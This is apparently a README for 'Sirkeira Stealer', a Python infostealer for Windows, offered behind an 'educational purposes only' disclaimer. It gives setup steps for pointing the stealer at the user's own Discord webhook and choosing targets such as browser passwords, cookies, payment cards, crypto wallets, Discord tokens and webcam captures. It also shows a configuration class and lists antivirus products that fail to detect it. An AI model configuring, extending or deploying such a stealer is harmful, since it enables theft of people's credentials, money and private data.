Warning
This code is provided for EDUCATIONAL PURPOSES ONLY to study system security. Malicious use of this software is strictly prohibited and illegal. The author is not responsible for any misuse.
This is a Python script that demonstrates the techniques used by "stealer" malware to extract sensitive information from a Windows system. It collects data such as browser passwords, cookies, Discord tokens, system information, and interesting files, then sends them to a Discord webhook. The code includes methods for system persistence, sandbox evasion, and task manager blocking.
Developed by: @CirqueiraDev
- Clone the repository or download the
skstealer.pyfile.
class Malware:
def __init__(self):
self.zip_name = f"SK_{random.randint(10000000000, 99999999999)}.zip"
self.webhook_url = "YOUR DISCORD WEBHOOK HERE"
self.stealer_version = "1.5.2"
self.malware_name = "Sirkeira Stealer"
self.malware_author = "https://t.me/CirqueiraDev"
self.browser_infos = ["extentions", "passwords", "cookies", "history", "downloads", "cards"]
self.session_files = ["Wallets", "Game Launchers", "Apps"]
self.task_manager_blocked = False # dont change this line- Open the
skstealer.pyfile and modify the configuration inside theMalwareclass:- Change
self.webhook_urlto your actual Discord webhook URL. - (Optional) Modify
self.browser_infosto select which browser data to steal (e.g.,"passwords","cookies"). - (Optional) Modify
self.session_filesto select which session files to target (e.g.,"Wallets","Game Launchers").
- Change
pip install -r requirements.txtrequests
psutil
browser-cookie3
cryptography
pywin32
pycryptodome
opencv-python
Pillow
- Screenshot
- Webcam
- System infos
- Browser infos (extentions, passwords, cookies, history, downloads, cards)
- Session files (Wallets, Game Launchers, Apps)
- AntiVirus infos
- Discord tokens
- Roblox cookies
- Interesting files
- Avast - Python:Stealer-FJ [PWS]
- AVG - Python:Stealer-FJ [PWS]
- ESET-NOD32 - Python/PSW.Agent.DYB Trojan
- Huorong - TrojanSpy.OSX.Stealer.e
- Rising - Stealer.Agent/Python!1.103FE (CLASSIC)
- Kaspersky - Undetected
- BitDefender - Undetected
- Malwarebytes - Undetected
- Microsoft Defender - Undetected
- CrowdStrike Falcon - Undetected
HASH:
e0fb6a9dfac0e9544f1a4c39a6e89a35b16b38aae8ad674f3085d7504ee8e3ab
VirusTotal detections may vary depending on heuristic analysis.
Important
The creator is not responsible for any direct or indirect damage resulting from misuse of this material.
Whatever you choose to do is entirely at your own risk and responsibility.
- Owner: CirqueiraDev
- For more information, contact: Telegram
- Discord: Cirqueira